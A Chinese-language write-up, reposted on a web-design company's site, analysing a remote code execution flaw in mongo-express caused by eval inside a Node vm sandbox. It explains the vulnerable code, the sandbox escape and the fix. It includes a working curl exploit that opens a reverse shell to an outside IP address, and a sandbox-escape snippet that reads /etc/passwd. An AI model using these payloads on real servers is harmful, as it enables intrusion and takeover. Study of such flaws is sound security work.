遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析

今天給大家介紹一下遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析。文章的內(nèi)容小編覺得不錯(cuò)，現(xiàn)在給大家分享一下，覺得有需要的朋友可以了解一下，希望對大家有所幫助，下面跟著小編的思路一起來閱讀吧。

專注于為中小企業(yè)提供成都網(wǎng)站設(shè)計(jì)、做網(wǎng)站、成都外貿(mào)網(wǎng)站建設(shè)公司服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)金門免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都，凝聚了一批互聯(lián)網(wǎng)行業(yè)人才，有力地推動(dòng)了千余家企業(yè)的穩(wěn)健成長，幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

0x01 認(rèn)識 mongo-express

mongo-express是一個(gè)MongoDB的Admin Web管理界面，使用NodeJS、Express、Bootstrap3編寫而成。目前mongo-express應(yīng)該是Github上Star最多的MongoDB admin管理界面。部署方便，使用簡單，成為了很多人管理mongo的選擇。

0x02 調(diào)試環(huán)境搭建

0x1 啟動(dòng)docker服務(wù)

閱讀官方GitHub的安全公告，我們發(fā)現(xiàn)漏洞影響0.54.0以下的所有版本。選擇以0.49為例進(jìn)行測試，由于此漏洞環(huán)境還需要MongoDB數(shù)據(jù)庫，我們可以通過執(zhí)行以下docker命令進(jìn)行快速搭建：

• 搭建MongoDB數(shù)據(jù)庫

docker run --name test -d mongo:3.2

• 搭建包含漏洞的mongo-express并且連接到上面的MongoDB數(shù)據(jù)庫：

docker run -d -p 8081:8081  --link test:mongo mongo-express:0.49

查看日志，確認(rèn)連接成功。

0x2 開啟nodejs調(diào)試選項(xiàng)

這里需要個(gè)技巧，如果要調(diào)試nodejs 需要在啟動(dòng)的時(shí)候加上 --inspect 參數(shù)。 在docker啟動(dòng)腳本做以下修改

docker restart 183

利用docker exec -it 183 bash連接docker查看debug服務(wù)是否開啟

如上圖中開啟9229端口即可。只需要外面主機(jī)能夠連接訪問9229端口就可以利用chrome插件進(jìn)行調(diào)試，可以用frp將端口轉(zhuǎn)發(fā)出來，或者利用docker -p 9229:9229參數(shù)做處理。

0x3 Chrome DevTools

利用chrome 插件可以實(shí)現(xiàn)像調(diào)試javascript腳本一樣調(diào)試nodejs，操作起來也是很方便。

首先下載debug插件

在chrome打開about:inspect chrome devtools在2016年5月就已經(jīng)支持Nodejs的調(diào)試，點(diǎn)擊Open dedicated DevTools for Node

配置連接地址和端口

接下來就像調(diào)試js一樣了

發(fā)送一個(gè)測試包，該路由分支可以斷下，接下來就開始調(diào)試本次漏洞了。

curl http://127.0.0.1:8081/checkValid -d 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash -i >& /dev/tcp/192.168.43.176/8003 0>&1 2>&1")'

0x03 漏洞調(diào)試及原理分析

本次調(diào)試的漏洞原理比較簡單，核心漏洞是命令拼接，這是一種最簡單的漏洞形式，但是利用起來需要點(diǎn)功夫，因?yàn)樾枰@過沙箱VM，好在nodejs的vm繞過有過研究基礎(chǔ)。多的不說，直接看最后的漏洞代碼

string為toBSON的參數(shù)，在MongoDB中BSON是一種常見的數(shù)據(jù)格式，與JSON是近親，但是和JSON的數(shù)據(jù)格式有很多區(qū)別，而然在mongo-express中的所有和BSON相關(guān)的操作，如新建一個(gè)文檔（類似其他數(shù)據(jù)庫的插入操作）都需要通過toBSON()函數(shù)。

例如下面操作

當(dāng)代碼流程走到bson.toBSON時(shí)會(huì)觸發(fā)eval函數(shù)，因?yàn)閚odejs可以作為后端語言所以該eval函數(shù)是在服務(wù)器端運(yùn)行，可以造成命令注入，對系統(tǒng)產(chǎn)生危害。

exp.checkValid = function (req, res) {var doc = req.body.document;try {  bson.toBSON(doc);} catch (err) {  console.error(err);  return res.send('Invalid');}res.send('Valid');  };

exports.toBSON = function (string) {  var sandbox = exports.getSandbox();  string = string.replace(/ISODate\(/g, 'new ISODate(');  string = string.replace(/Binary\(("[^"]+"),/g, 'Binary(new Buffer($1, "base64"),');  vm.runInNewContext('doc = eval((' + string + '));', sandbox);  return sandbox.doc;};

由代碼溯源分析得到，toBSON的參數(shù)string是req.body中的document，因此這一部分我們可控?？梢园l(fā)現(xiàn)vm.runInNewContext函數(shù)，這是一個(gè)虛擬沙箱。因此們下一節(jié)分析怎么繞過沙箱防護(hù)。

0x04 nodejs 沙箱繞過

沙箱是一個(gè)能夠安全執(zhí)行不受信任的代碼，且不影響外部實(shí)際代碼的獨(dú)立環(huán)境。在沙箱里代碼執(zhí)行往往會(huì)被限制。VM模塊提供在VM虛擬機(jī)上下文中編譯運(yùn)行代碼的API。使用VM模塊可以在沙箱環(huán)境中運(yùn)行代碼。運(yùn)行的代碼使用不同的V8上下文，也就是它的全局變量不同于其他代碼。但是沙箱里的代碼仍然可以訪問Node進(jìn)程。我們經(jīng)常使用該方法去繞過。

0x1 現(xiàn)象

vm.js

"use strict";const vm = require("vm");const xyz = vm.runInNewContext(`this.constructor.constructor('return this.process.env')()`);console.log(xyz);

可以看到this.process.env獲取到了nodejs進(jìn)程的信息，這說明完全可以切回主程序去執(zhí)行系統(tǒng)命令。

0x2 解釋

在javascript中this指向它所屬的對象，所以我們使用它時(shí)就已經(jīng)指向了一個(gè)VM上下文之外的對象。那么訪問this的 .constructor 就返回 Object Constructor ，訪問 Object Constructor 的 .constructor 返回 Function constructor 。 Function constructor 就像javascript里的最高函數(shù)它允許全局訪問。Function constructor允許從字符串生成函數(shù)，從而執(zhí)行任意代碼。所以我們可以利用它返回主進(jìn)程。之后我們就能用它來訪問主進(jìn)程，然后進(jìn)行RCE。

"use strict";const vm = require("vm");const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')(); process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);console.log(xyz);

同理vm2 函數(shù)也可以繞過，這里還是參照原文進(jìn)行學(xué)習(xí)吧  https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html

0x05 漏洞修補(bǔ)

這里放兩個(gè)圖可以說明一切，利用mongo-query-parser 去解析BSON數(shù)據(jù)，直接從根源替換。

以上就是遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析的全部內(nèi)容了，更多與遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析相關(guān)的內(nèi)容可以搜索創(chuàng)新互聯(lián)之前的文章或者瀏覽下面的文章進(jìn)行學(xué)習(xí)哈！相信小編會(huì)給大家增添更多知識,希望大家能夠支持一下創(chuàng)新互聯(lián)！

名稱欄目：遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析
當(dāng)前網(wǎng)址：http://bm7419.com/article46/giphhg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供微信小程序、全網(wǎng)營銷推廣、標(biāo)簽優(yōu)化、企業(yè)網(wǎng)站制作、網(wǎng)站收錄、云服務(wù)器

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)